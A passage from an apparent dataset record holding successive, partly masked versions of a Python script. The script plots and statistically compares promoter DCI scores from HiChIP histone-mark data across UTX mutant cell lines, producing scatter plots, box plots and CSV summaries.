DCI$>{}$ in WT/Vector'.format(dci_thre))\n plt.scatter(dci_df_x.loc[dn_bins, 'DCI'], dci_df_y.loc[dn_bins,\n 'DCI'], c='tab:blue', s=3, alpha=1, rasterized=True, label=\n 'Genes w/ DCI$<{}$ in WT/Vector'.format(-1 * dci_thre))\n x, y = dci_df_x.loc[:, 'DCI'], dci_df_y.loc[:, 'DCI']\n slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)\n output_prename = '{}_{}_{}_dci{}'.format(subdir, hm_mark, suffix,\n dci_thre)\n num_DCI_bins_df.loc[output_prename, 'scatter_pearsonr_s'] = r_value\n num_DCI_bins_df.loc[output_prename, 'scatter_pearsonr_p'] = p_value\n x_sort = np.sort(x)\n plt.plot(x_sort, x_sort * slope + intercept, c='k', ls='--', lw=0.8)\n plt.text(0.97, 0.97, '$r={:.2f}$ '.format(r_value), fontsize=10,\n transform=plt.axes().transAxes, ha='right', va='top')\n plt.axhline(y=0, c='k', lw=1)\n plt.axvline(x=0, c='k', lw=1)\n plt.legend(fontsize=10.5, borderaxespad=0.1, labelspacing=0.1,\n handletextpad=0.1, handlelength=1, loc='upper left',\n markerscale=3, bbox_to_anchor=[-0.12, 1.36], frameon=False)\n xa, xb = cellType_labels[compr_x.split('_')[0]], cellType_labels[\n compr_x.split('_')[-1]]\n ya, yb = cellType_labels[compr_y.split('_')[0]], cellType_labels[\n compr_y.split('_')[-1]]\n plt.xlabel('DCI score ({} over {})'.format(xa, xb), fontsize=12)\n plt.ylabel('DCI score ({} over {})'.format(ya, yb), fontsize=12)\n plt.savefig('{}/{}/scatter_{}_{}_vs_{}{}_dci{}.png'.format(outdir,\n subdir, hm_mark, compr_x, compr_y, suffix, dci_thre),\n bbox_inches='tight', pad_inches=0.1, dpi=600, transparent=True)\n plt.show()\n plt.close()\n return up_bins, dn_bins\n return [], []\n\n\ndef plot_box_figs(subdir, hm_mark, suffix, selected_bins, color, title,\n dci_thre, num_DCI_bins_df, flag):\n test_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n 'WT_over_Vector', suffix)\n if os.path.isfile(test_file):\n box_vals = []\n xticklabels = []\n sig_vals, sig_colors = [], []\n for compr_col in ['WT_over_Vector', 'DEL_over_WT', 'EIF_over_DEL',\n 'TPR_over_WT']:\n dci_df = return_dci_df(DCI_dir, subdir, hm_mark, compr_col, suffix)\n if dci_df is not None:\n box_val = dci_df.loc[selected_bins]['DCI'].values\n 
dci_df.loc[selected_bins].to_csv(\n '{}/{}/box_{}_{}_genes{}_dci{}_{}.csv'.format(outdir,\n subdir, hm_mark, flag, suffix, dci_thre, compr_col))\n s, p = stats.ttest_1samp(box_val, 0)\n sig_vals.append('*' if p < 0.05 else '')\n sig_colors.append('b' if s < 0 else 'r')\n box_vals.append(box_val)\n xa, xb = cellType_labels[compr_col.split('_')[0]\n ], cellType_labels[compr_col.split('_')[-1]]\n xticklabels.append('{} over {}'.format(xa, xb))\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir, hm_mark,\n suffix, dci_thre), '{} {} s'.format(title.split()[2],\n compr_col)] = '{:.2f}'.format(s)\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir, hm_mark,\n suffix, dci_thre), '{} {} p'.format(title.split()[2],\n compr_col)] = '{:.2e}'.format(p)\n positions = np.arange(len(box_vals))\n fig = plt.figure(figsize=(0.46 * len(box_vals), 2.2))\n g = plt.boxplot(box_vals, positions=positions, widths=0.5,\n patch_artist=True, boxprops=dict(color='k', facecolor='w', fill\n =None, lw=1), medianprops=dict(color='k'), showfliers=False)\n plt.axes().set_xticklabels(xticklabels, rotation=30, ha='right',\n fontsize=12)\n plt.ylabel('DCI score'.format(hm_mark), fontsize=13)\n for ii in positions:\n plt.scatter(ii, np.median(box_vals[ii]), marker=sig_vals[ii],\n color='red', s=77)\n plt.axhline(y=0, c='k', lw=1)\n plt.title(title, fontsize=12)\n plt.savefig('{}/{}/box_{}_{}_genes{}_dci{}.png'.format(outdir,\n subdir, hm_mark, flag, suffix, dci_thre), bbox_inches='tight',\n pad_inches=0.1, dpi=600, transparent=True)\n plt.show()\n plt.close()\n\n\n<mask token>\n",
"step-2": "<mask token>\nsns.set(font_scale=1.1)\nsns.set_style('whitegrid', {'axes.grid': False})\nsns.set_style('ticks', {'ytick.color': 'k', 'axes.edgecolor': 'k'})\n<mask token>\n\n\ndef return_dci_df(DCI_dir, subdir, hm_mark, compr_type, suffix):\n dci_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n compr_type, suffix)\n if os.path.isfile(dci_file):\n dci_df = pd.read_csv(dci_file, sep='\\t', index_col=4)\n dci_df.columns = ['chr', 'start', 'end', 'IfOverlap', 'score',\n 'strand', 'DCI']\n return dci_df\n else:\n return None\n\n\ndef scatter_plot_compr_DCI(num_DCI_bins_df, subdir, hm_mark, compr_type,\n suffix, dci_thre):\n compr_x = compr_type[0]\n compr_y = compr_type[1]\n test_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n compr_y, suffix)\n if os.path.isfile(test_file):\n dci_df_wt_over_vector = return_dci_df(DCI_dir, subdir, hm_mark,\n 'WT_over_Vector', suffix)\n up_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI'] > dci_thre\n ].index\n dn_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI'] < -1 *\n dci_thre].index\n dci_df_x = return_dci_df(DCI_dir, subdir, hm_mark, compr_x, suffix)\n dci_df_y = return_dci_df(DCI_dir, subdir, hm_mark, compr_y, suffix)\n plt.figure(figsize=(2.1, 2.1))\n plt.scatter(dci_df_x.loc[:, 'DCI'], dci_df_y.loc[:, 'DCI'], c=\n 'tab:grey', s=3, alpha=1, rasterized=True, label='All genes')\n plt.scatter(dci_df_x.loc[up_bins, 'DCI'], dci_df_y.loc[up_bins,\n 'DCI'], c='tab:red', s=3, alpha=1, rasterized=True, label=\n 'Genes w/ DCI$>{}$ in WT/Vector'.format(dci_thre))\n plt.scatter(dci_df_x.loc[dn_bins, 'DCI'], dci_df_y.loc[dn_bins,\n 'DCI'], c='tab:blue', s=3, alpha=1, rasterized=True, label=\n 'Genes w/ DCI$<{}$ in WT/Vector'.format(-1 * dci_thre))\n x, y = dci_df_x.loc[:, 'DCI'], dci_df_y.loc[:, 'DCI']\n slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)\n output_prename = '{}_{}_{}_dci{}'.format(subdir, hm_mark, suffix,\n dci_thre)\n num_DCI_bins_df.loc[output_prename, 'scatter_pearsonr_s'] = r_value\n num_DCI_bins_df.loc[output_prename, 'scatter_pearsonr_p'] = p_value\n x_sort = np.sort(x)\n plt.plot(x_sort, x_sort * slope + intercept, c='k', ls='--', lw=0.8)\n plt.text(0.97, 0.97, '$r={:.2f}$ '.format(r_value), fontsize=10,\n transform=plt.axes().transAxes, ha='right', va='top')\n plt.axhline(y=0, c='k', lw=1)\n plt.axvline(x=0, c='k', lw=1)\n plt.legend(fontsize=10.5, borderaxespad=0.1, labelspacing=0.1,\n handletextpad=0.1, handlelength=1, loc='upper left',\n markerscale=3, bbox_to_anchor=[-0.12, 1.36], frameon=False)\n xa, xb = cellType_labels[compr_x.split('_')[0]], cellType_labels[\n compr_x.split('_')[-1]]\n ya, yb = cellType_labels[compr_y.split('_')[0]], cellType_labels[\n compr_y.split('_')[-1]]\n plt.xlabel('DCI score ({} over {})'.format(xa, xb), fontsize=12)\n plt.ylabel('DCI score ({} over {})'.format(ya, yb), fontsize=12)\n plt.savefig('{}/{}/scatter_{}_{}_vs_{}{}_dci{}.png'.format(outdir,\n subdir, hm_mark, compr_x, compr_y, suffix, dci_thre),\n bbox_inches='tight', pad_inches=0.1, dpi=600, transparent=True)\n plt.show()\n plt.close()\n return up_bins, dn_bins\n return [], []\n\n\ndef plot_box_figs(subdir, hm_mark, suffix, selected_bins, color, title,\n dci_thre, num_DCI_bins_df, flag):\n test_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n 'WT_over_Vector', suffix)\n if os.path.isfile(test_file):\n box_vals = []\n xticklabels = []\n sig_vals, sig_colors = [], []\n for compr_col in ['WT_over_Vector', 'DEL_over_WT', 'EIF_over_DEL',\n 'TPR_over_WT']:\n dci_df = 
return_dci_df(DCI_dir, subdir, hm_mark, compr_col, suffix)\n if dci_df is not None:\n box_val = dci_df.loc[selected_bins]['DCI'].values\n dci_df.loc[selected_bins].to_csv(\n '{}/{}/box_{}_{}_genes{}_dci{}_{}.csv'.format(outdir,\n subdir, hm_mark, flag, suffix, dci_thre, compr_col))\n s, p = stats.ttest_1samp(box_val, 0)\n sig_vals.append('*' if p < 0.05 else '')\n sig_colors.append('b' if s < 0 else 'r')\n box_vals.append(box_val)\n xa, xb = cellType_labels[compr_col.split('_')[0]\n ], cellType_labels[compr_col.split('_')[-1]]\n xticklabels.append('{} over {}'.format(xa, xb))\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir, hm_mark,\n suffix, dci_thre), '{} {} s'.format(title.split()[2],\n compr_col)] = '{:.2f}'.format(s)\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir, hm_mark,\n suffix, dci_thre), '{} {} p'.format(title.split()[2],\n compr_col)] = '{:.2e}'.format(p)\n positions = np.arange(len(box_vals))\n fig = plt.figure(figsize=(0.46 * len(box_vals), 2.2))\n g = plt.boxplot(box_vals, positions=positions, widths=0.5,\n patch_artist=True, boxprops=dict(color='k', facecolor='w', fill\n =None, lw=1), medianprops=dict(color='k'), showfliers=False)\n plt.axes().set_xticklabels(xticklabels, rotation=30, ha='right',\n fontsize=12)\n plt.ylabel('DCI score'.format(hm_mark), fontsize=13)\n for ii in positions:\n plt.scatter(ii, np.median(box_vals[ii]), marker=sig_vals[ii],\n color='red', s=77)\n plt.axhline(y=0, c='k', lw=1)\n plt.title(title, fontsize=12)\n plt.savefig('{}/{}/box_{}_{}_genes{}_dci{}.png'.format(outdir,\n subdir, hm_mark, flag, suffix, dci_thre), bbox_inches='tight',\n pad_inches=0.1, dpi=600, transparent=True)\n plt.show()\n plt.close()\n\n\n<mask token>\nos.makedirs(outdir, exist_ok=True)\n<mask token>\nfor subdir in subdirs[1:2]:\n outdir_tmp = '{}/{}'.format(outdir, subdir)\n os.makedirs(outdir_tmp, exist_ok=True)\n for hm_mark in hm_marks[:]:\n for suffix in suffixes[:]:\n for dci_thre in dci_thres[1:]:\n for compr_type in compr_types[:]:\n up_bins, dn_bins = scatter_plot_compr_DCI(num_DCI_bins_df,\n subdir, hm_mark, compr_type, suffix, dci_thre)\n if compr_type[1] == 'DEL_over_WT':\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,\n hm_mark, suffix, dci_thre), '# up genes'] = len(\n up_bins)\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,\n hm_mark, suffix, dci_thre), '# dn genes'] = len(\n dn_bins)\n selected_bins = up_bins\n color = 'tab:red'\n title = ('Genes w/ DCI$>{}$ \\n in WT over Vector'.\n format(dci_thre))\n plot_box_figs(subdir, hm_mark, suffix,\n selected_bins, color, title, dci_thre,\n num_DCI_bins_df, 'increased')\n selected_bins = dn_bins\n color = 'tab:blue'\n title = ('Genes w/ DCI$<{}$ \\n in WT over Vector'.\n format(-1 * dci_thre))\n plot_box_figs(subdir, hm_mark, suffix,\n selected_bins, color, title, dci_thre,\n num_DCI_bins_df, 'decreased')\nnum_DCI_bins_df.to_csv(outdir + os.sep + 'num_DCI_promoter_summary.csv')\n",
"step-3": "<mask token>\nmatplotlib.rcParams['font.size'] = 11\n<mask token>\nsns.set(font_scale=1.1)\nsns.set_style('whitegrid', {'axes.grid': False})\nsns.set_style('ticks', {'ytick.color': 'k', 'axes.edgecolor': 'k'})\nmatplotlib.rcParams['font.sans-serif'] = ['Arial']\nmatplotlib.rcParams['mathtext.fontset'] = 'custom'\nmatplotlib.rcParams['mathtext.rm'] = 'Arial'\n\n\ndef return_dci_df(DCI_dir, subdir, hm_mark, compr_type, suffix):\n dci_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n compr_type, suffix)\n if os.path.isfile(dci_file):\n dci_df = pd.read_csv(dci_file, sep='\\t', index_col=4)\n dci_df.columns = ['chr', 'start', 'end', 'IfOverlap', 'score',\n 'strand', 'DCI']\n return dci_df\n else:\n return None\n\n\ndef scatter_plot_compr_DCI(num_DCI_bins_df, subdir, hm_mark, compr_type,\n suffix, dci_thre):\n compr_x = compr_type[0]\n compr_y = compr_type[1]\n test_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n compr_y, suffix)\n if os.path.isfile(test_file):\n dci_df_wt_over_vector = return_dci_df(DCI_dir, subdir, hm_mark,\n 'WT_over_Vector', suffix)\n up_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI'] > dci_thre\n ].index\n dn_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI'] < -1 *\n dci_thre].index\n dci_df_x = return_dci_df(DCI_dir, subdir, hm_mark, compr_x, suffix)\n dci_df_y = return_dci_df(DCI_dir, subdir, hm_mark, compr_y, suffix)\n plt.figure(figsize=(2.1, 2.1))\n plt.scatter(dci_df_x.loc[:, 'DCI'], dci_df_y.loc[:, 'DCI'], c=\n 'tab:grey', s=3, alpha=1, rasterized=True, label='All genes')\n plt.scatter(dci_df_x.loc[up_bins, 'DCI'], dci_df_y.loc[up_bins,\n 'DCI'], c='tab:red', s=3, alpha=1, rasterized=True, label=\n 'Genes w/ DCI$>{}$ in WT/Vector'.format(dci_thre))\n plt.scatter(dci_df_x.loc[dn_bins, 'DCI'], dci_df_y.loc[dn_bins,\n 'DCI'], c='tab:blue', s=3, alpha=1, rasterized=True, label=\n 'Genes w/ DCI$<{}$ in WT/Vector'.format(-1 * dci_thre))\n x, y = dci_df_x.loc[:, 'DCI'], dci_df_y.loc[:, 'DCI']\n slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)\n output_prename = '{}_{}_{}_dci{}'.format(subdir, hm_mark, suffix,\n dci_thre)\n num_DCI_bins_df.loc[output_prename, 'scatter_pearsonr_s'] = r_value\n num_DCI_bins_df.loc[output_prename, 'scatter_pearsonr_p'] = p_value\n x_sort = np.sort(x)\n plt.plot(x_sort, x_sort * slope + intercept, c='k', ls='--', lw=0.8)\n plt.text(0.97, 0.97, '$r={:.2f}$ '.format(r_value), fontsize=10,\n transform=plt.axes().transAxes, ha='right', va='top')\n plt.axhline(y=0, c='k', lw=1)\n plt.axvline(x=0, c='k', lw=1)\n plt.legend(fontsize=10.5, borderaxespad=0.1, labelspacing=0.1,\n handletextpad=0.1, handlelength=1, loc='upper left',\n markerscale=3, bbox_to_anchor=[-0.12, 1.36], frameon=False)\n xa, xb = cellType_labels[compr_x.split('_')[0]], cellType_labels[\n compr_x.split('_')[-1]]\n ya, yb = cellType_labels[compr_y.split('_')[0]], cellType_labels[\n compr_y.split('_')[-1]]\n plt.xlabel('DCI score ({} over {})'.format(xa, xb), fontsize=12)\n plt.ylabel('DCI score ({} over {})'.format(ya, yb), fontsize=12)\n plt.savefig('{}/{}/scatter_{}_{}_vs_{}{}_dci{}.png'.format(outdir,\n subdir, hm_mark, compr_x, compr_y, suffix, dci_thre),\n bbox_inches='tight', pad_inches=0.1, dpi=600, transparent=True)\n plt.show()\n plt.close()\n return up_bins, dn_bins\n return [], []\n\n\ndef plot_box_figs(subdir, hm_mark, suffix, selected_bins, color, title,\n dci_thre, num_DCI_bins_df, flag):\n test_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n 'WT_over_Vector', suffix)\n if 
os.path.isfile(test_file):\n box_vals = []\n xticklabels = []\n sig_vals, sig_colors = [], []\n for compr_col in ['WT_over_Vector', 'DEL_over_WT', 'EIF_over_DEL',\n 'TPR_over_WT']:\n dci_df = return_dci_df(DCI_dir, subdir, hm_mark, compr_col, suffix)\n if dci_df is not None:\n box_val = dci_df.loc[selected_bins]['DCI'].values\n dci_df.loc[selected_bins].to_csv(\n '{}/{}/box_{}_{}_genes{}_dci{}_{}.csv'.format(outdir,\n subdir, hm_mark, flag, suffix, dci_thre, compr_col))\n s, p = stats.ttest_1samp(box_val, 0)\n sig_vals.append('*' if p < 0.05 else '')\n sig_colors.append('b' if s < 0 else 'r')\n box_vals.append(box_val)\n xa, xb = cellType_labels[compr_col.split('_')[0]\n ], cellType_labels[compr_col.split('_')[-1]]\n xticklabels.append('{} over {}'.format(xa, xb))\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir, hm_mark,\n suffix, dci_thre), '{} {} s'.format(title.split()[2],\n compr_col)] = '{:.2f}'.format(s)\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir, hm_mark,\n suffix, dci_thre), '{} {} p'.format(title.split()[2],\n compr_col)] = '{:.2e}'.format(p)\n positions = np.arange(len(box_vals))\n fig = plt.figure(figsize=(0.46 * len(box_vals), 2.2))\n g = plt.boxplot(box_vals, positions=positions, widths=0.5,\n patch_artist=True, boxprops=dict(color='k', facecolor='w', fill\n =None, lw=1), medianprops=dict(color='k'), showfliers=False)\n plt.axes().set_xticklabels(xticklabels, rotation=30, ha='right',\n fontsize=12)\n plt.ylabel('DCI score'.format(hm_mark), fontsize=13)\n for ii in positions:\n plt.scatter(ii, np.median(box_vals[ii]), marker=sig_vals[ii],\n color='red', s=77)\n plt.axhline(y=0, c='k', lw=1)\n plt.title(title, fontsize=12)\n plt.savefig('{}/{}/box_{}_{}_genes{}_dci{}.png'.format(outdir,\n subdir, hm_mark, flag, suffix, dci_thre), bbox_inches='tight',\n pad_inches=0.1, dpi=600, transparent=True)\n plt.show()\n plt.close()\n\n\ncellType_labels = {'Vector': 'Vector', 'WT': 'WT', 'DEL': '$\\\\Delta$cIDR',\n 'EIF': 'UTX-eIF$_{IDR}$', 'TPR': '$\\\\Delta$TPR', 'MT2': 'MT2', 'FUS':\n 'UTX-FUS$_{IDR}$'}\noutdir = 'f4_promoter_DCI_scatter'\nos.makedirs(outdir, exist_ok=True)\nproject_dir = '/Volumes/zanglab/zw5j/since2019_projects/UTX_HaoJiang'\nDCI_dir = (\n '{}/f5_hichip/f1_hichip_bart3d_new/f1_DEG_promoter_DCI/f1_promoter_DCI'\n .format(project_dir))\nsubdirs = ['bart3d_dis200k_data_1st_submit', 'bart3d_dis200k_data202008',\n 'bart3d_dis500k_data_1st_submit', 'bart3d_dis500k_data202008']\ncompr_types = [['WT_over_Vector', 'DEL_over_WT'], ['DEL_over_WT',\n 'EIF_over_DEL'], ['WT_over_Vector', 'TPR_over_WT']]\nhm_marks = ['H3K4me3', 'H3K27ac']\nsuffixes = ['_promoter_DCI']\ndci_thres = [2, 5]\nnum_DCI_bins_df = pd.DataFrame()\nfor subdir in subdirs[1:2]:\n outdir_tmp = '{}/{}'.format(outdir, subdir)\n os.makedirs(outdir_tmp, exist_ok=True)\n for hm_mark in hm_marks[:]:\n for suffix in suffixes[:]:\n for dci_thre in dci_thres[1:]:\n for compr_type in compr_types[:]:\n up_bins, dn_bins = scatter_plot_compr_DCI(num_DCI_bins_df,\n subdir, hm_mark, compr_type, suffix, dci_thre)\n if compr_type[1] == 'DEL_over_WT':\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,\n hm_mark, suffix, dci_thre), '# up genes'] = len(\n up_bins)\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,\n hm_mark, suffix, dci_thre), '# dn genes'] = len(\n dn_bins)\n selected_bins = up_bins\n color = 'tab:red'\n title = ('Genes w/ DCI$>{}$ \\n in WT over Vector'.\n format(dci_thre))\n plot_box_figs(subdir, hm_mark, suffix,\n selected_bins, color, title, dci_thre,\n num_DCI_bins_df, 'increased')\n 
selected_bins = dn_bins\n color = 'tab:blue'\n title = ('Genes w/ DCI$<{}$ \\n in WT over Vector'.\n format(-1 * dci_thre))\n plot_box_figs(subdir, hm_mark, suffix,\n selected_bins, color, title, dci_thre,\n num_DCI_bins_df, 'decreased')\nnum_DCI_bins_df.to_csv(outdir + os.sep + 'num_DCI_promoter_summary.csv')\n",
"step-4": "import sys, argparse\nimport os, glob\nimport numpy as np\nimport pandas as pd\nimport re, bisect\nfrom scipy import stats\nimport matplotlib\nimport matplotlib.pyplot as plt\nmatplotlib.rcParams['font.size'] = 11\nimport seaborn as sns\nsns.set(font_scale=1.1)\nsns.set_style('whitegrid', {'axes.grid': False})\nsns.set_style('ticks', {'ytick.color': 'k', 'axes.edgecolor': 'k'})\nmatplotlib.rcParams['font.sans-serif'] = ['Arial']\nmatplotlib.rcParams['mathtext.fontset'] = 'custom'\nmatplotlib.rcParams['mathtext.rm'] = 'Arial'\n\n\ndef return_dci_df(DCI_dir, subdir, hm_mark, compr_type, suffix):\n dci_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n compr_type, suffix)\n if os.path.isfile(dci_file):\n dci_df = pd.read_csv(dci_file, sep='\\t', index_col=4)\n dci_df.columns = ['chr', 'start', 'end', 'IfOverlap', 'score',\n 'strand', 'DCI']\n return dci_df\n else:\n return None\n\n\ndef scatter_plot_compr_DCI(num_DCI_bins_df, subdir, hm_mark, compr_type,\n suffix, dci_thre):\n compr_x = compr_type[0]\n compr_y = compr_type[1]\n test_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n compr_y, suffix)\n if os.path.isfile(test_file):\n dci_df_wt_over_vector = return_dci_df(DCI_dir, subdir, hm_mark,\n 'WT_over_Vector', suffix)\n up_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI'] > dci_thre\n ].index\n dn_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI'] < -1 *\n dci_thre].index\n dci_df_x = return_dci_df(DCI_dir, subdir, hm_mark, compr_x, suffix)\n dci_df_y = return_dci_df(DCI_dir, subdir, hm_mark, compr_y, suffix)\n plt.figure(figsize=(2.1, 2.1))\n plt.scatter(dci_df_x.loc[:, 'DCI'], dci_df_y.loc[:, 'DCI'], c=\n 'tab:grey', s=3, alpha=1, rasterized=True, label='All genes')\n plt.scatter(dci_df_x.loc[up_bins, 'DCI'], dci_df_y.loc[up_bins,\n 'DCI'], c='tab:red', s=3, alpha=1, rasterized=True, label=\n 'Genes w/ DCI$>{}$ in WT/Vector'.format(dci_thre))\n plt.scatter(dci_df_x.loc[dn_bins, 'DCI'], dci_df_y.loc[dn_bins,\n 'DCI'], c='tab:blue', s=3, alpha=1, rasterized=True, label=\n 'Genes w/ DCI$<{}$ in WT/Vector'.format(-1 * dci_thre))\n x, y = dci_df_x.loc[:, 'DCI'], dci_df_y.loc[:, 'DCI']\n slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)\n output_prename = '{}_{}_{}_dci{}'.format(subdir, hm_mark, suffix,\n dci_thre)\n num_DCI_bins_df.loc[output_prename, 'scatter_pearsonr_s'] = r_value\n num_DCI_bins_df.loc[output_prename, 'scatter_pearsonr_p'] = p_value\n x_sort = np.sort(x)\n plt.plot(x_sort, x_sort * slope + intercept, c='k', ls='--', lw=0.8)\n plt.text(0.97, 0.97, '$r={:.2f}$ '.format(r_value), fontsize=10,\n transform=plt.axes().transAxes, ha='right', va='top')\n plt.axhline(y=0, c='k', lw=1)\n plt.axvline(x=0, c='k', lw=1)\n plt.legend(fontsize=10.5, borderaxespad=0.1, labelspacing=0.1,\n handletextpad=0.1, handlelength=1, loc='upper left',\n markerscale=3, bbox_to_anchor=[-0.12, 1.36], frameon=False)\n xa, xb = cellType_labels[compr_x.split('_')[0]], cellType_labels[\n compr_x.split('_')[-1]]\n ya, yb = cellType_labels[compr_y.split('_')[0]], cellType_labels[\n compr_y.split('_')[-1]]\n plt.xlabel('DCI score ({} over {})'.format(xa, xb), fontsize=12)\n plt.ylabel('DCI score ({} over {})'.format(ya, yb), fontsize=12)\n plt.savefig('{}/{}/scatter_{}_{}_vs_{}{}_dci{}.png'.format(outdir,\n subdir, hm_mark, compr_x, compr_y, suffix, dci_thre),\n bbox_inches='tight', pad_inches=0.1, dpi=600, transparent=True)\n plt.show()\n plt.close()\n return up_bins, dn_bins\n return [], []\n\n\ndef plot_box_figs(subdir, hm_mark, suffix, 
selected_bins, color, title,\n dci_thre, num_DCI_bins_df, flag):\n test_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n 'WT_over_Vector', suffix)\n if os.path.isfile(test_file):\n box_vals = []\n xticklabels = []\n sig_vals, sig_colors = [], []\n for compr_col in ['WT_over_Vector', 'DEL_over_WT', 'EIF_over_DEL',\n 'TPR_over_WT']:\n dci_df = return_dci_df(DCI_dir, subdir, hm_mark, compr_col, suffix)\n if dci_df is not None:\n box_val = dci_df.loc[selected_bins]['DCI'].values\n dci_df.loc[selected_bins].to_csv(\n '{}/{}/box_{}_{}_genes{}_dci{}_{}.csv'.format(outdir,\n subdir, hm_mark, flag, suffix, dci_thre, compr_col))\n s, p = stats.ttest_1samp(box_val, 0)\n sig_vals.append('*' if p < 0.05 else '')\n sig_colors.append('b' if s < 0 else 'r')\n box_vals.append(box_val)\n xa, xb = cellType_labels[compr_col.split('_')[0]\n ], cellType_labels[compr_col.split('_')[-1]]\n xticklabels.append('{} over {}'.format(xa, xb))\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir, hm_mark,\n suffix, dci_thre), '{} {} s'.format(title.split()[2],\n compr_col)] = '{:.2f}'.format(s)\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir, hm_mark,\n suffix, dci_thre), '{} {} p'.format(title.split()[2],\n compr_col)] = '{:.2e}'.format(p)\n positions = np.arange(len(box_vals))\n fig = plt.figure(figsize=(0.46 * len(box_vals), 2.2))\n g = plt.boxplot(box_vals, positions=positions, widths=0.5,\n patch_artist=True, boxprops=dict(color='k', facecolor='w', fill\n =None, lw=1), medianprops=dict(color='k'), showfliers=False)\n plt.axes().set_xticklabels(xticklabels, rotation=30, ha='right',\n fontsize=12)\n plt.ylabel('DCI score'.format(hm_mark), fontsize=13)\n for ii in positions:\n plt.scatter(ii, np.median(box_vals[ii]), marker=sig_vals[ii],\n color='red', s=77)\n plt.axhline(y=0, c='k', lw=1)\n plt.title(title, fontsize=12)\n plt.savefig('{}/{}/box_{}_{}_genes{}_dci{}.png'.format(outdir,\n subdir, hm_mark, flag, suffix, dci_thre), bbox_inches='tight',\n pad_inches=0.1, dpi=600, transparent=True)\n plt.show()\n plt.close()\n\n\ncellType_labels = {'Vector': 'Vector', 'WT': 'WT', 'DEL': '$\\\\Delta$cIDR',\n 'EIF': 'UTX-eIF$_{IDR}$', 'TPR': '$\\\\Delta$TPR', 'MT2': 'MT2', 'FUS':\n 'UTX-FUS$_{IDR}$'}\noutdir = 'f4_promoter_DCI_scatter'\nos.makedirs(outdir, exist_ok=True)\nproject_dir = '/Volumes/zanglab/zw5j/since2019_projects/UTX_HaoJiang'\nDCI_dir = (\n '{}/f5_hichip/f1_hichip_bart3d_new/f1_DEG_promoter_DCI/f1_promoter_DCI'\n .format(project_dir))\nsubdirs = ['bart3d_dis200k_data_1st_submit', 'bart3d_dis200k_data202008',\n 'bart3d_dis500k_data_1st_submit', 'bart3d_dis500k_data202008']\ncompr_types = [['WT_over_Vector', 'DEL_over_WT'], ['DEL_over_WT',\n 'EIF_over_DEL'], ['WT_over_Vector', 'TPR_over_WT']]\nhm_marks = ['H3K4me3', 'H3K27ac']\nsuffixes = ['_promoter_DCI']\ndci_thres = [2, 5]\nnum_DCI_bins_df = pd.DataFrame()\nfor subdir in subdirs[1:2]:\n outdir_tmp = '{}/{}'.format(outdir, subdir)\n os.makedirs(outdir_tmp, exist_ok=True)\n for hm_mark in hm_marks[:]:\n for suffix in suffixes[:]:\n for dci_thre in dci_thres[1:]:\n for compr_type in compr_types[:]:\n up_bins, dn_bins = scatter_plot_compr_DCI(num_DCI_bins_df,\n subdir, hm_mark, compr_type, suffix, dci_thre)\n if compr_type[1] == 'DEL_over_WT':\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,\n hm_mark, suffix, dci_thre), '# up genes'] = len(\n up_bins)\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,\n hm_mark, suffix, dci_thre), '# dn genes'] = len(\n dn_bins)\n selected_bins = up_bins\n color = 'tab:red'\n title = ('Genes w/ DCI$>{}$ 
\\n in WT over Vector'.\n format(dci_thre))\n plot_box_figs(subdir, hm_mark, suffix,\n selected_bins, color, title, dci_thre,\n num_DCI_bins_df, 'increased')\n selected_bins = dn_bins\n color = 'tab:blue'\n title = ('Genes w/ DCI$<{}$ \\n in WT over Vector'.\n format(-1 * dci_thre))\n plot_box_figs(subdir, hm_mark, suffix,\n selected_bins, color, title, dci_thre,\n num_DCI_bins_df, 'decreased')\nnum_DCI_bins_df.to_csv(outdir + os.sep + 'num_DCI_promoter_summary.csv')\n",
